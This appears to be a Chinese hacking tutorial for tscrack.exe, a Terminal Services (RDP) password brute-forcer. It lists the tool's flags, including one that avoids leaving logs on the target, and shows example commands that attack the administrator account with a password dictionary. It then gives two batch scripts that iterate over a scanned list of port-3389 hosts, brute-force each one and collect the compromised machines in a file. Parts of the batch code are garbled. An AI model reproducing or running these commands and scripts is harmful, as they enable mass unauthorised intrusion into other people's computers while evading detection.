终端服务密码破解: tscrack.exe

参数说明 

-h 显示使用帮助 

-v 显示版本信息 

-s 在屏幕上打出解密能力 

-b 密码错误时发出的声音 

-t 同是发出多个连接（多线程） 

-N Prevent System Log entries on targeted server 

-U 卸载移除tscrack组件 

-f 使用－f后面的密码 

-F 间隔时间（频率） 

-l 使用－l后面的用户名 

-w 使用－w后面的密码字典 

-p 使用－p后面的密码 

-D 登录主页面 

用法示例 

tscrack 192.168.0.1 -l ***istrator -w pass.dic 远程用密码字典文件暴破主机的***istrator的登陆密码 

tscrack 192.168.0.1 -l ***istrator -p 123456 用密码123456远程登陆192.168.0.1的***istrator用户 

@if not exist ipcscan.txt goto noscan 

@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i 

nscan 

@echo 3389.txt no find or scan faild 

(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt) 

3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat 

@if not exist tscrack.exe goto noscan 

@tscrack %1 -l ***istrator -w pass.dic >>rouji.txt 

:noscan 

@echo tscrack.exe no find or scan faild 

(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了) 

hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的***istrator密码，并将破解结果保存在rouji.txt文件中。